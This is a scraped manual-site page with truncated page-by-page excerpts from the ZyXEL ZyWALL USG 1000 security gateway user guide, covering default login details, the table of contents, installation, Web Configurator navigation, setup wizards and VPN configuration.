manualshive.com logo in svg

ZyXEL Communications ZyWALL 1050, Manual

The ZyXEL Communications ZyWALL 1050 is a powerful networking device. Ensure compliance with industry standards by downloading the Declaration of Conformity from our website, completely free of charge. Access the user manual for a comprehensive guide to maximizing the potential of this product, exclusively at manualshive.com.

Share
Download
background image

www.zyxel.com

www.zyxel.com

ZyWALL USG 1000

Unified Security Gateway

Copyright © 2010 
ZyXEL Communications Corporation

Firmware Version 2.20

Edition 2, 9/2010

Default Login Details

LAN Port

P1

IP Address https://192.168.1.1
User Name

admin

Password

1234

Summary of Contents for ZyWALL 1050

Page 1: ... com ZyWALL USG 1000 Unified Security Gateway Copyright 2010 ZyXEL Communications Corporation Firmware Version 2 20 Edition 2 9 2010 Default Login Details LAN Port P1 IP Address https 192 168 1 1 User Name admin Password 1234 ...

Page 2: ......

Page 3: ...ssential terms used in the ZyWALL what prerequisites are needed to configure a feature and how to use that feature It is highly recommended you read Chapter 7 on page 117 for ZyWALL application examples Subsequent chapters are arranged by menu item as defined in the Web Configurator Read each chapter carefully for detailed information on that menu item To find specific information in this guide us...

Page 4: ...ation from this link Read the Tech Doc Overview to find out how to efficiently use the User Guide Quick Start Guide and Command Line Interface Reference Guide in order to better understand how to use your product Knowledge Base If you have a specific question about your product the answer may be here This is a collection of answers to previously asked questions about ZyXEL products Forum This cont...

Page 5: ...al number Warranty Information Date that you received your device Brief description of the problem and the steps you took to solve it Disclaimer Graphics in this book may differ slightly from the product due to differences in operating systems operating system versions or if you installed updated firmware software for your device Every effort has been made to ensure that the information in this ma...

Page 6: ... key stroke is denoted by square brackets and uppercase text for example ENTER means the enter or return key on your keyboard Enter means for you to type one or more characters and then press the ENTER key Select or choose means for you to use one of the predefined choices A right angle bracket within a screen name denotes a mouse click For example Maintenance Log Log Setting means you first click...

Page 7: ... User s Guide 7 Icons Used in Figures Figures in this User s Guide may use the following generic icons The ZyWALL icon is not an exact representation of your device ZyWALL Computer Notebook computer Server Firewall Telephone Switch Router ...

Page 8: ...rd and do NOT place the product where anyone can walk on the power adaptor or cord Do NOT use the device if the power adaptor or cord is damaged as it might cause electrocution If the power adaptor or cord is damaged remove it from the device and the power source Do NOT attempt to repair the power adaptor or cord Contact your local vendor to order a new one Do not use the device outside and make s...

Page 9: ...ical Reference 207 Dashboard 209 Monitor 223 Registration 265 Signature Update 271 Interfaces 277 Trunks 337 Policy and Static Routes 347 Routing Protocols 363 Zones 377 DDNS 381 NAT 387 HTTP Redirect 397 ALG 403 IP MAC Binding 411 Authentication Policy 417 Firewall 425 IPSec VPN 443 SSL VPN 485 SSL User Screens 499 SSL User Application Screens 509 SSL User File Sharing 511 ZyWALL SecuExtender 519...

Page 10: ...ice HA 677 User Group 699 Addresses 715 Services 721 Schedules 727 AAA Server 733 Authentication Method 743 Certificates 749 ISP Accounts 771 SSL Application 775 Endpoint Security 783 System 793 Log and Report 845 File Manager 863 Diagnostics 875 Reboot 885 Shutdown 887 Troubleshooting 889 Product Specifications 909 ...

Page 11: ...ounted Installation Procedure 34 1 3 Front Panel 35 1 3 1 Front Panel LEDs 35 1 4 Management Overview 35 1 5 Starting and Stopping the ZyWALL 37 Chapter 2 Features and Applications 39 2 1 Features 39 2 2 Applications 41 2 2 1 VPN Connectivity 42 2 2 2 SSL VPN Network Access 42 2 2 3 User Aware Access Control 44 2 2 4 Multiple WAN Interfaces 44 2 2 5 Device HA 45 Chapter 3 Web Configurator 47 3 1 W...

Page 12: ... 2 1 Choose an Ethernet Interface 76 5 2 2 Select WAN Type 76 5 2 3 Configure WAN Settings 77 5 2 4 WAN and ISP Connection Settings 78 5 2 5 Quick Setup Interface Wizard Summary 80 5 3 VPN Quick Setup 81 5 4 VPN Setup Wizard Wizard Type 82 5 5 VPN Express Wizard Scenario 83 5 5 1 VPN Express Wizard Configuration 84 5 5 2 VPN Express Wizard Summary 85 5 5 3 VPN Express Wizard Finish 86 5 5 4 VPN Ad...

Page 13: ...9 DDNS 105 6 5 10 NAT 105 6 5 11 HTTP Redirect 106 6 5 12 ALG 107 6 5 13 Auth Policy 107 6 5 14 Firewall 107 6 5 15 IPSec VPN 108 6 5 16 SSL VPN 108 6 5 17 L2TP VPN 109 6 5 18 Application Patrol 109 6 5 19 Anti Virus 110 6 5 20 IDP 110 6 5 21 ADP 110 6 5 22 Content Filter 110 6 5 23 Anti Spam 111 6 5 24 Device HA 111 6 6 Objects 112 6 6 1 User Group 112 6 7 System 113 6 7 1 DNS WWW SSH TELNET FTP ...

Page 14: ... on Groups 140 7 8 How to Use Endpoint Security and Authentication Policies 142 7 8 1 Configure the Endpoint Security Objects 142 7 8 2 Configure the Authentication Policy 144 7 9 How to Configure Service Control 145 7 9 1 Allow HTTPS Administrator Access Only From the LAN 146 7 10 How to Allow Incoming H 323 Peer to peer Calls 148 7 10 1 Turn On the ALG 149 7 10 2 Set Up a NAT Policy For H 323 14...

Page 15: ...ng L2TP in Windows XP 183 8 5 3 Configuring L2TP in Windows 2000 189 Part II Technical Reference 207 Chapter 9 Dashboard 209 9 1 Overview 209 9 1 1 What You Can Do in this Chapter 209 9 2 The Dashboard Screen 209 9 2 1 The CPU Usage Screen 216 9 2 2 The Memory Usage Screen 217 9 2 3 The Session Usage Screen 218 9 2 4 The VPN Status Screen 219 9 2 5 The DHCP Table Screen 219 9 2 6 The Number of Log...

Page 16: ...e Anti Virus Statistics Screen 250 10 16 The IDP Statistics Screen 252 10 17 The Content Filter Statistics Screen 254 10 18 Content Filter Cache Screen 255 10 19 The Anti Spam Statistics Screen 258 10 20 The Anti Spam Status Screen 260 10 21 Log Screen 261 Chapter 11 Registration 265 11 1 Overview 265 11 1 1 What You Can Do in this Chapter 265 11 1 2 What you Need to Know 265 11 2 The Registration...

Page 17: ...uxiliary Interface 327 13 8 1 Auxiliary Interface Overview 327 13 8 2 Auxiliary 327 13 9 Virtual Interfaces 329 13 9 1 Virtual Interfaces Add Edit 330 13 10 Interface Technical Reference 331 Chapter 14 Trunks 337 14 1 Overview 337 14 1 1 What You Can Do in this Chapter 337 14 1 2 What You Need to Know 338 14 2 The Trunk Summary Screen 342 14 3 Configuring a Trunk 343 14 4 Trunk Technical Reference...

Page 18: ...t You Can Do in this Chapter 377 17 1 2 What You Need to Know 378 17 2 The Zone Screen 379 17 3 Zone Edit 380 Chapter 18 DDNS 381 18 1 DDNS Overview 381 18 1 1 What You Can Do in this Chapter 381 18 1 2 What You Need to Know 381 18 2 The DDNS Screen 382 18 2 1 The Dynamic DNS Add Edit Screen 384 Chapter 19 NAT 387 19 1 NAT Overview 387 19 1 1 What You Can Do in this Chapter 387 19 1 2 What You Nee...

Page 19: ...HCP Edit 414 22 3 IP MAC Binding Exempt List 415 Chapter 23 Authentication Policy 417 23 1 Overview 417 23 1 1 What You Can Do in this Chapter 417 23 1 2 What You Need to Know 418 23 2 Authentication Policy Screen 418 23 2 1 Adding Exceptional Services 420 23 2 2 Creating Editing an Authentication Policy 421 Chapter 24 Firewall 425 24 1 Overview 425 24 1 1 What You Can Do in this Chapter 425 24 1 ...

Page 20: ...entrator Add Edit Screen 470 25 5 IPSec VPN Background Information 471 Chapter 26 SSL VPN 485 26 1 Overview 485 26 1 1 What You Can Do in this Chapter 485 26 1 2 What You Need to Know 485 26 2 The SSL Access Privilege Screen 488 26 2 1 The SSL Access Policy Add Edit Screen 490 26 3 The SSL Global Setting Screen 492 26 3 1 How to Upload a Custom Logo 494 26 4 Establishing an SSL VPN Connection 495 ...

Page 21: ...pend and Resume the Connection 521 30 5 Stop the Connection 522 30 6 Uninstalling the ZyWALL SecuExtender 522 Chapter 31 L2TP VPN 523 31 1 Overview 523 31 1 1 What You Can Do in this Chapter 523 31 1 2 What You Need to Know 523 31 2 L2TP VPN Screen 525 Chapter 32 Application Patrol 527 32 1 Overview 527 32 1 1 What You Can Do in this Chapter 527 32 1 2 What You Need to Know 528 32 1 3 Application ...

Page 22: ... Need To Know 569 34 1 3 Before You Begin 570 34 2 The IDP General Screen 571 34 3 Introducing IDP Profiles 573 34 3 1 Base Profiles 574 34 4 The Profile Summary Screen 575 34 5 Creating New Profiles 576 34 5 1 Procedure To Create a New Profile 576 34 6 Profiles Packet Inspection 577 34 6 1 Profile Group View Screen 577 34 6 2 Policy Types 580 34 6 3 IDP Service Groups 581 34 6 4 Profile Query Vie...

Page 23: ... 36 1 1 What You Can Do in this Chapter 627 36 1 2 What You Need to Know 627 36 1 3 Before You Begin 629 36 2 Content Filter General Screen 629 36 3 Content Filter Policy Add or Edit Screen 632 36 4 Content Filter Profile Screen 634 36 5 Content Filter Categories Screen 634 36 5 1 Content Filter Blocked and Warning Messages 646 36 6 Content Filter Customization Screen 647 36 7 Content Filter Techn...

Page 24: ...ce 685 39 5 The Legacy Mode Screen 687 39 6 Configuring the Legacy Mode Screen 688 39 7 Device HA Technical Reference 692 Chapter 40 User Group 699 40 1 Overview 699 40 1 1 What You Can Do in this Chapter 699 40 1 2 What You Need To Know 699 40 2 User Summary Screen 702 40 2 1 User Add Edit Screen 702 40 3 User Group Summary Screen 705 40 3 1 Group Add Edit Screen 706 40 4 Setting Screen 707 40 4 ...

Page 25: ...creen 729 43 2 2 The Recurring Schedule Add Edit Screen 730 Chapter 44 AAA Server 733 44 1 Overview 733 44 1 1 Directory Service AD LDAP 733 44 1 2 RADIUS Server 734 44 1 3 ASAS 734 44 1 4 What You Can Do in this Chapter 734 44 1 5 What You Need To Know 735 44 2 Active Directory or LDAP Server Summary 737 44 2 1 Adding an Active Directory or LDAP Server 737 44 3 RADIUS Server Summary 739 44 3 1 Ad...

Page 26: ...7 1 Overview 771 47 1 1 What You Can Do in this Chapter 771 47 2 ISP Account Summary 771 47 2 1 ISP Account Edit 772 Chapter 48 SSL Application 775 48 1 Overview 775 48 1 1 What You Can Do in this Chapter 775 48 1 2 What You Need to Know 775 48 1 3 Example Specifying a Web Site for Access 776 48 2 The SSL Application Screen 777 48 2 1 Creating Editing a Web based SSL Application Object 778 48 2 2 ...

Page 27: ...50 7 WWW Overview 808 50 7 1 Service Access Limitations 809 50 7 2 System Timeout 809 50 7 3 HTTPS 809 50 7 4 Configuring WWW Service Control 810 50 7 5 Service Control Rules 814 50 7 6 Customizing the WWW Login Page 814 50 7 7 HTTPS Example 818 50 8 SSH 825 50 8 1 How SSH Works 826 50 8 2 SSH Implementation on the ZyWALL 827 50 8 3 Requirements for Using SSH 827 50 8 4 Configuring SSH 827 50 8 5 ...

Page 28: ...ter 863 52 1 2 What you Need to Know 863 52 2 The Configuration File Screen 866 52 3 The Firmware Package Screen 870 52 4 The Shell Script Screen 872 Chapter 53 Diagnostics 875 53 1 Overview 875 53 1 1 What You Can Do in this Chapter 875 53 2 The Diagnostic Screen 875 53 2 1 The Diagnostics Files Screen 876 53 3 The Packet Capture Screen 877 53 3 1 The Packet Capture Files Screen 880 53 3 2 Exampl...

Page 29: ...6 56 2 Getting More Troubleshooting Help 907 Chapter 57 Product Specifications 909 57 1 3G PCMCIA Card Installation 915 Appendix A Log Descriptions 917 Appendix B Common Services 977 Appendix C Displaying Anti Virus Alert Messages in Windows 981 Appendix D Importing Certificates 987 Appendix E Open Software Announcements 1013 Appendix F Legal Information 1071 Index 1075 ...

Page 30: ...Table of Contents ZyWALL USG 1000 User s Guide 30 ...

Page 31: ...31 PART I User s Guide ...

Page 32: ...32 ...

Page 33: ...stant Messaging IM and Peer to Peer P2P control NAT port forwarding policy routing DHCP server and many other powerful features Flexible configuration helps you set up the network and enforce security policies efficiently See Chapter 2 on page 39 for a more detailed overview of the ZyWALL s features 1 2 Rack mounted Installation The ZyWALL can be mounted on an EIA standard size 19 inch rack or in ...

Page 34: ... included bracket screws smaller than the rack mounting screws 2 Attach the other bracket in a similar fashion Figure 1 Attaching Mounting Brackets and Screws 3 After attaching both mounting brackets position the ZyWALL in the rack by lining up the holes in the brackets with the appropriate holes on the rack Secure the ZyWALL to the rack with the rack mounting screws Figure 2 Rack Mounting ...

Page 35: ...rt the device see Section 1 5 on page 37 If the LED turns red again then please contact your vendor SYS Green Off The ZyWALL is not ready or has failed On The ZyWALL is ready and running Flashing The ZyWALL is restarting AUX Green Off The AUX port is not connected Flashing The AUX port is sending or receiving packets On The AUX port is connected HDD Green Off Reserved for future use No hard disk i...

Page 36: ...se text based commands to configure the ZyWALL You can access it using remote management for example SSH or Telnet or via the console port See the Command Reference Guide for more information about the CLI Console Port You can use the console port to manage the ZyWALL using CLI commands See the Command Reference Guide for more information about the CLI The default settings for the console port are...

Page 37: ...Rebooting the ZyWALL A warm start without powering down and powering up again occurs when you use the Reboot button in the Reboot screen or when you use the reboot command The ZyWALL writes all cached data to the local storage stops the system processes and then does a warm start Using the RESET button If you press the RESET button the ZyWALL sets the configuration to its default values and then r...

Page 38: ...Chapter 1 Introducing the ZyWALL ZyWALL USG 1000 User s Guide 38 ...

Page 39: ...des reliable secure Internet access set up one or more of the following Multiple WAN ports and configure load balancing between these ports One or more 3G cellular connections An auxiliary backup Internet connection A backup ZyWALL in the event the master ZyWALL fails device HA Virtual Private Networks VPN Use IPSec SSL or L2TP VPN to provide secure communication between two sites over the Interne...

Page 40: ...n violations of protocol standards RFCs Requests for Comments Abnormal flows such as port scans The ZyWALL s ADP protects against network based intrusions See Section 35 3 4 on page 610 and Section 35 3 5 on page 613 for more on the kinds of attacks that the ZyWALL can protect against You can also create your own custom ADP rules Bandwidth Management Bandwidth management allows you to allocate net...

Page 41: ...cted of being used by spammers Application Patrol Application patrol App Patrol manages instant messenger IM peer to peer P2P applications like MSN and BitTorrent You can even control the use of a particular application s individual features like text messaging voice video conferencing and file transfers Application patrol has powerful bandwidth management including traffic prioritization to enhan...

Page 42: ...gure the ZyWALL to provide SSL VPN network access to remote users There are two SSL VPN network access modes reverse proxy and full tunnel 2 2 2 1 Reverse Proxy Mode In reverse proxy mode the ZyWALL is a proxy that acts on behalf of the local network servers such as your web and mail servers As the final destination the ZyWALL appears to be the server to remote users This provides an added layer o...

Page 43: ...el mode a virtual connection is created for remote users with private IP addresses in the same subnet as the local network This allows them to access network resources in the same way as if they were part of the internal network Figure 7 Network Access Mode Full Tunnel Mode Web Mail File Share Web based Application LAN 192 168 1 X https Web Mail File Share Web based Application https Application S...

Page 44: ...ormation and shared resources based on the user who is trying to access it Figure 8 Applications User Aware Access Control 2 2 4 Multiple WAN Interfaces Set up multiple connections to the Internet on the same port or set up multiple connections on different ports In either case you can balance the loads between them Figure 9 Applications Multiple WAN Interfaces ...

Page 45: ...ures and Applications ZyWALL USG 1000 User s Guide 45 2 2 5 Device HA Set up an additional ZyWALL as a backup gateway to ensure the default gateway is always available for the network Figure 10 Applications Device HA ...

Page 46: ...Chapter 2 Features and Applications ZyWALL USG 1000 User s Guide 46 ...

Page 47: ...eb Configurator you must Use Internet Explorer 7 or later or Firefox 1 5 or later Allow pop up windows blocked by default in Windows XP Service Pack 2 Enable JavaScript enabled by default Enable Java permissions enabled by default Enable cookies The recommended screen resolution is 1024 x 768 pixels 3 2 Web Configurator Access 1 Make sure your ZyWALL hardware is properly connected See the Quick St...

Page 48: ...d password default 1234 If your account is configured to use an ASAS authentication server use the OTP One Time Password token to generate a number Enter it in the One Time Password field The number is only good for one login You must use the token to generate a new number the next time you log in 4 Click Login If you logged in using the default user name and password the Update Admin Info screen ...

Page 49: ...is screen If you change the default password the Login screen Figure 11 on page 48 appears after you click Apply If you click Ignore the Installation Setup Wizard opens if the ZyWALL is using its default configuration see Chapter 4 on page 65 otherwise the dashboard appears as shown next Figure 13 Dashboard 3 3 Web Configurator Screens Overview The Web Configurator screen is divided into these par...

Page 50: ...t of the Web Configurator Help Click this to open the help page for the current screen About Click this to display basic information about the ZyWALL Site Map Click this to see an overview of links to the Web Configurator screens Object Reference Click this to open a screen where you can check which configuration items reference an object Console Click this to open the console in which you can use...

Page 51: ... menus and their screens Figure 16 Navigation Panel 3 3 2 1 Dashboard The dashboard displays general device information system status system resource usage licensed service status and interface status in widgets that you can re arrange to suit your needs See Chapter 9 on page 209 for details on the dashboard Table 5 About LABEL DESCRIPTION Boot Module This shows the version number of the software ...

Page 52: ... clients Cellular Status Displays details about the ZyWALL s 3G connection status USB Storage Displays information about a connected USB storage device AppPatrol Statistics Displays bandwidth and protocol statistics VPN Monitor IPSec Displays and manages the active IPSec SAs SSL Lists users currently logged into the VPN SSL client portal You can also log out individual users and delete related ses...

Page 53: ... port groups Ethernet Manage Ethernet interfaces and virtual Ethernet interfaces PPP Create and manage PPPoE and PPTP interfaces Cellular Configure a cellular Internet connection for an installed 3G card VLAN Create and manage VLAN interfaces and virtual VLAN interfaces Bridge Create and manage bridges and virtual bridge interfaces Auxiliary Manage the AUX port Trunk Create and manage trunks for l...

Page 54: ...TP Over IPSec VPN settings AppPatrol General Enable or disable traffic management by application and see registration and signature information Common Manage traffic of the most commonly used web file transfer and e mail protocols IM Manage instant messenger traffic Peer to Peer Manage peer to peer traffic VoIP Manage VoIP traffic Streaming Manage streaming traffic Other Manage other kinds of traf...

Page 55: ... Group Create and manage groups of users Setting Manage default settings for all users general settings for user sessions and rules to force user authentication Address Address Create and manage host range and network subnet addresses Address Group Create and manage groups of addresses Service Service Create and manage TCP and UDP services Service Group Create and manage groups of services Schedul...

Page 56: ... HTTPS and general authentication Login Page Configure how the login and access user screens look SSH Configure SSH server and SSH service settings TELNET Configure telnet server settings for the ZyWALL FTP Configure FTP server settings SNMP Configure SNMP communities and services Dial in Mgmt Configure settings for an out of band management connection through a modem connected to the AUX port Van...

Page 57: ...ages such as those resulting from misconfiguration display in a popup window Figure 17 Warning Message Table 8 Maintenance Menu Screens Summary FOLDER OR LINK TAB FUNCTION File Manager Configuration File Manage and upload configuration files for the ZyWALL Firmware Package View the current firmware version and to upload firmware Shell Script Manage and run shell script files for the ZyWALL Diagnos...

Page 58: ...een Figure 18 Site Map 3 3 3 3 Object Reference Click Object Reference to open the Object Reference screen Select the type of object and the individual object and click Refresh to show which configuration settings reference the object The following example shows which configuration settings reference the ldap users user object in this case the first firewall rule Figure 19 Object Reference ...

Page 59: ...EL DESCRIPTION Object Name This identifies the object for which the configuration settings that use it are displayed Click the object s name to display the object s configuration screen in the main window This field is a sequential value and it is not associated with any entry Service This is the type of setting that references the selected object Click a service s name to display the service s co...

Page 60: ...y a Column s Criteria 2 Click the down arrow next to a column heading for more options about how to display the entries The options available vary depending on the type of fields in the column Here are some examples of what you can do Sort in ascending alphabetical order Sort in descending reverse alphabetical order Select which columns to display Group entries by field Show entries in groups Filt...

Page 61: ...umn heading and drag and drop it to change the column order A green check mark displays next to the column s title when you drag the column to a valid new location Figure 24 Changing the Column Order 5 Use the icons and fields at the bottom of the table to navigate to different pages of entries and control how many entries display at a time Figure 25 Navigating Pages of Table Entries ...

Page 62: ...ick Edit to open a screen where you can modify the entry s settings In some tables you can just click a table entry and edit it directly in the table For those types of tables small red triangles display for table entries with changes that you have not yet applied Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Activate To turn on an e...

Page 63: ...r 3 Web Configurator ZyWALL USG 1000 User s Guide 63 you can also use the Shift or Ctrl key to select multiple entries and then use the arrow button to move them to the other list Figure 27 Working with Lists ...

Page 64: ...Chapter 3 Web Configurator ZyWALL USG 1000 User s Guide 64 ...

Page 65: ...ure Internet connection settings and activate subscription services This chapter provides information on configuring the Web Configurator s installation setup wizard See the feature specific chapters in this User s Guide for background information Figure 28 Installation Setup Wizard Click the double arrow in the upper right corner to display or hide the help Click Go to Dashboard to skip the insta...

Page 66: ...o Internet connections Leave it cleared to configure just one This option appears when you are configuring the first WAN interface Encapsulation Choose the Ethernet option when the WAN port is used as a regular Ethernet Otherwise choose PPPoE or PPTP for a dial up connection according to the information from your ISP WAN Interface This is the interface you are configuring for Internet access Zone ...

Page 67: ...reen The following fields display if you selected static IP address assignment IP Subnet Mask Enter the subnet mask for this WAN connection s IP address Gateway IP Address Enter the IP address of the router through which this WAN connection will send traffic the default gateway First Second DNS Server These fields display if you selected static IP address assignment The Domain Name System DNS maps...

Page 68: ...r outgoing connection requests Options are CHAP PAP Your ZyWALL accepts either CHAP or PAP when requested by the remote node CHAP Your ZyWALL accepts CHAP only PAP Your ZyWALL accepts PAP only MSCHAP Your ZyWALL accepts MSCHAP only MSCHAP V2 Your ZyWALL accepts MSCHAP V2 only Type the User Name given to you by your ISP You can use alphanumeric and _ characters and it can be up to 31 characters lon...

Page 69: ...in name to an IP address and vice versa Enter a DNS server s IP address es The DNS server is extremely important because without it you must know the IP address of a computer before you can access it The ZyWALL uses these in the order you specify here to resolve domain names for VPN DDNS and the time server Leave the field as 0 0 0 0 if you do not want to configure DNS servers If you do not config...

Page 70: ...SP if given Server IP Type the IP address of the PPTP server Type a Connection ID or connection name It must follow the c id and n name format For example C 12 or N My ISP This field is optional and depends on the requirements of your broadband modem or router You can use alphanumeric and _ characters and it can be up to 31 characters long 4 1 5 2 WAN IP Address Assignments First WAN Interface Thi...

Page 71: ...cond WAN Interface The screens for configuring the second WAN interface are similar to the first see Section 4 1 1 on page 66 Figure 33 Internet Access Step 3 Second WAN Interface 4 1 7 Internet Access Finish You have set up your ZyWALL to access the Internet After configuring the WAN interface s a screen displays with your settings If they are not correct click Back Figure 34 Internet Access Ethe...

Page 72: ...n Use this screen to register your ZyWALL with myZXEL com and activate trial periods of subscription security features if you have not already done so If the ZyWALL is already registered this screen displays your user name and which trial services are activated if any You can still activate any un activated trial services Note You must be connected to the Internet to register Use the Registration ...

Page 73: ...rd Use six to 20 alphanumeric characters and the underscore Spaces are not allowed Type it again in the Confirm Password field E Mail Address Enter your e mail address Use up to 80 alphanumeric characters periods and the underscore are also allowed without spaces Country Code Select your country from the drop down box list Trial Service Activation You can try a trial service subscription The trial...

Page 74: ...Chapter 4 Installation Setup Wizard ZyWALL USG 1000 User s Guide 74 ...

Page 75: ...this User s Guide for background information In the Web Configurator click Configuration Quick Setup to open the first Quick Setup screen Figure 37 Quick Setup WAN Interface Click this link to open a wizard to set up a WAN Internet connection This wizard creates matching ISP account settings in the ZyWALL if you use PPPoE or PPTP See Section 5 2 on page 76 VPN SETUP Use VPN SETUP to configure a VP...

Page 76: ...e an interface to connect to the internet Click Next Figure 38 WAN Interface Quick Setup Wizard 5 2 1 Choose an Ethernet Interface Select the Ethernet interface that you want to configure for a WAN connection and click Next Figure 39 Choose an Ethernet Interface 5 2 2 Select WAN Type WAN Type Selection Select the type of encapsulation this connection is to use Choose Ethernet when the WAN port is ...

Page 77: ...tion provided by your ISP to know what to enter in each field Leave a field blank if you don t have that information Note Enter the Internet access information exactly as your ISP gave it to you 5 2 3 Configure WAN Settings Use this screen to select to which zone the interface belongs and whether the interface should use a fixed or dynamic IP address Figure 41 WAN Interface Setup Step 2 WAN Interf...

Page 78: ...s This screen is read only if you set the IP Address Assignment to Static Note Enter the Internet access information exactly as your ISP gave it to you Figure 42 WAN and ISP Connection Settings PPTP Shown The following table describes the labels in this screen Table 11 WAN and ISP Connection Settings LABEL DESCRIPTION ISP Parameter This section appears if the interface uses a PPPoE or PPTP Interne...

Page 79: ...TP Configuration This section only appears if the interface uses a PPPoE or PPTP Internet connection Base Interface This displays the identity of the Ethernet interface you configure to connect with a modem or router Base IP Address Type the static IP address assigned to you by your ISP IP Subnet Mask Type the subnet mask assigned to you by your ISP if given Server IP Type the IP address of the PP...

Page 80: ... to access it DNS Domain Name System is for mapping a domain name to its corresponding IP address and vice versa The DNS server is extremely important because without it you must know the IP address of a computer before you can access it The ZyWALL uses a system DNS server in the order you specify here to resolve domain names for VPN DDNS and the time server Back Click Back to return to the previo...

Page 81: ...ection will not time out Yes means the ZyWALL uses the idle timeout Idle Timeout This is how many seconds the connection can be idle before the router automatically disconnects from the PPPoE server 0 means no timeout Connection ID If you specified a connection ID it displays here WAN Interface This identifies the interface you configure to connect with your ISP Zone This field displays to which s...

Page 82: ...lect which type of VPN connection you want to configure Figure 45 VPN Setup Wizard Wizard Type Express Use this wizard to create a VPN connection with another ZLD based ZyWALL using a pre shared key and default security settings Advanced Use this wizard to configure detailed VPN security settings such as using certificates The VPN connection can be to another ZLD based ZyWALL or other IPSec device...

Page 83: ...figure on the left of the screen changes to match the scenario you select Site to site Choose this if the remote IPSec device has a static IP address or a domain name This ZyWALL can initiate the VPN tunnel Site to site with Dynamic Peer Choose this if the remote IPSec device has a dynamic IP address Only the remote IPSec device can initiate the VPN tunnel Remote Access Server Role Choose this to ...

Page 84: ... use the same password Use 8 to 31 case sensitive ASCII characters or 8 to 31 pairs of hexadecimal 0 9 A F characters Proceed a hexadecimal key with 0x You will receive a PYLD_MALFORMED payload malformed packet if the same pre shared key is not used on both ends Local Policy IP Mask Type the IP address of a computer on your network You can also specify a subnet This must match the remote IP addres...

Page 85: ...iation Local Policy Static IP address and subnet mask of the computers on the network behind your ZyWALL that can use the tunnel Remote Policy Static IP address and subnet mask of the computers on the network behind the remote IPSec device that can use the tunnel If this field displays Any only the remote IPSec device can initiate the VPN connection Copy and paste the Configuration for Secure Gate...

Page 86: ... Express Wizard Finish Now you can use the VPN tunnel Figure 49 VPN Express Wizard Step 6 Note If you have not already done so use the myZyXEL com link and register your ZyWALL with myZyXEL com and activate trials of services like IDP Click Close to exit the wizard ...

Page 87: ...Select the scenario that best describes your intended VPN connection The figure on the left of the screen changes to match the scenario you select Site to site Choose this if the remote IPSec device has a static IP address or a domain name This ZyWALL can initiate the VPN tunnel Site to site with Dynamic Peer Choose this if the remote IPSec device has a dynamic IP address Only the remote IPSec dev...

Page 88: ...re gateway to identify the remote IPSec device by its IP address or a domain name Use 0 0 0 0 if the remote IPSec device has a dynamic WAN IP address My Address interface Select an interface from the drop down list box to use on your ZyWALL Negotiation Mode Select Main for identity protection Select Aggressive to allow more incoming connections from dynamic IP addresses to use separate passwords N...

Page 89: ...man Group 2 a 1024 bit 1Kb random number DH5 refers to Diffie Hellman Group 5 a 1536 bit random number SA Life Time Set how often the ZyWALL renegotiates the IKE SA A short SA life time increases security but renegotiation temporarily disconnects the VPN tunnel NAT Traversal Select this if the VPN tunnel must pass through NAT there is a NAT router between the IPSec devices Note The remote IPSec de...

Page 90: ...er SA Life Time Set how often the ZyWALL renegotiates the IKE SA A short SA life time increases security but renegotiation temporarily disconnects the VPN tunnel Perfect Forward Secrecy PFS Disabling PFS allows faster IPSec setup but is less secure Select DH1 DH2 or DH5 to enable PFS DH5 is more secure than DH1 or DH2 although it may affect throughput DH1 refers to Diffie Hellman Group 1 a 768 bit...

Page 91: ...and the VPN gateway Secure Gateway IP address or domain name of the remote IPSec device Pre Shared Key VPN tunnel password Certificate The certificate the ZyWALL uses to identify itself when setting up the VPN tunnel Local Policy IP address and subnet mask of the computers on the network behind your ZyWALL that can use the tunnel Remote Policy IP address and subnet mask of the computers on the net...

Page 92: ...5 5 8 VPN Advanced Wizard Finish Now you can use the VPN tunnel Figure 54 VPN Wizard Step 6 Advanced Note If you have not already done so you can register your ZyWALL with myZyXEL com and activate trials of services like IDP Click Close to exit the wizard ...

Page 93: ...ou configure the trunk you should configure a policy route for it as well You might also have to configure criteria for the policy route Section 6 6 on page 112 identifies the objects that store information used by other features Section 6 7 on page 113 introduces some of the tools available for system management 6 1 Object based Configuration The ZyWALL stores information or settings as objects Y...

Page 94: ...es Interfaces and Physical Ports Zones groups of interfaces and VPN tunnels simplify security settings Here is an overview of zones interfaces and physical ports in the ZyWALL Figure 55 Table 13 Zones Interfaces and Physical Ethernet Ports Zones WAN LAN DMZ A zone is a group of interfaces and VPN tunnels Use zones to apply security settings such as firewall IDP remote management anti virus and app...

Page 95: ...e tagged frames The ZyWALL automatically adds or removes the tags as needed Each VLAN can only be associated with one Ethernet interface Bridge interfaces create a software connection between Ethernet or VLAN interfaces at the layer 2 data link MAC address level Then you can configure the IP address and subnet mask of the bridge It is also possible to configure zone level security between the memb...

Page 96: ...WAN zone contains the ge2 and ge3 interfaces physical ports 2 and 3 They use public IP addresses to connect to the Internet The DMZ zone contains the ge4 and ge5 interfaces physical ports 4 and 5 The DMZ zone has servers that are available to the public These interface uses private IP addresses 192 168 2 1 and 192 168 3 1 PORT INTERFACE ZONE IP ADDRESS AND DHCP SETTINGS SUGGESTED USE WITH DEFAULT ...

Page 97: ... and spoke VPN VPN concentrator Table 16 ZLD ZyWALL Terminology That Might Be Different Than Other Products FEATURE TERM ZLD ZYWALL FEATURE TERM Source NAT SNAT Policy route Table 17 NAT Differences Between ZLD ZyWALL and ZyNOS ZYNOS FEATURE SCREEN ZLD ZYWALL FEATURE SCREEN Trigger port port triggering Policy route Address mapping Policy route Address mapping VPN IPSec VPN Table 18 Bandwidth Manag...

Page 98: ...l interfaces you don t need to configure anything to all LAN to WAN or WLAN to WAN traffic The ZyWALL automatically adds all of the external interfaces to the default WAN trunk External interfaces include ppp cellular and AUX interfaces as well as any Ethernet interfaces that are set as external interfaces Examples of internal interfaces are WLAN interfaces and any Ethernet interfaces that you con...

Page 99: ...how to route them The following figure shows how the ZLD 2 20 firmware s routing table compares with the earlier 2 1x firmware s routing table The checking flow is from top to bottom As soon as the packets match an entry in one of the sections the ZyWALL stops checking the packets against the routing table and moves on to the other checks for example the firewall check Figure 58 Routing Table Chec...

Page 100: ... dynamic IPSec rules option moves the routes for dynamic IPSec rules up above the policy routes see Section 25 2 on page 446 5 Static and Dynamic Routes This section contains the user configured static routes and the dynamic routing information learned from other routers through RIP and OSPF See Chapter 15 on page 347 for more information 6 Default WAN Trunk For any traffic coming in through an in...

Page 101: ...luding Many 1 to 1 is also included in the NAT table 3 NAT loopback is now included in the NAT table instead of requiring a separate policy route 4 SNAT is also now performed by default and included in the NAT table 6 5 Feature Configuration Overview This section provides information about configuring the main features in the ZyWALL The features are listed in the same sequence as the menu item s i...

